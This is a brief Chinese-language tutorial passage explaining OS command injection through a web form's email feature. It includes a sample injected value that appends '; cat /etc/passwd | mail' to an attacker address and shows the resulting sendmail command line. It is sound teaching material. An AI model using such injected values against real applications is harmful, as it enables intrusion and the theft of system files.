OS命令注入攻击是指通过Web应用,执行非法的操作系统命令达到攻击的目的
OS注入攻击案例:以表单的发送功能为例,该功能可将用户的邮件按已填写的对方邮箱地址放过去。
- 攻击者将下面的值指定作为邮件地址:
; cat /etc/passwd | mail [email protected]
- 程序接收该值,构成以下的命令组合:
“| /usr/sbin/sendmail ; cat /etc/passwd | mail [email protected]”
- 攻击者的输入值中分号(;)。这个符号在OS命令中,会被解析为分割多个执行命令的标记。sendmail命令执行完就会执行下面的命令,结果/etc/passwd的文件,就以邮件的形式发送给了
[email protected]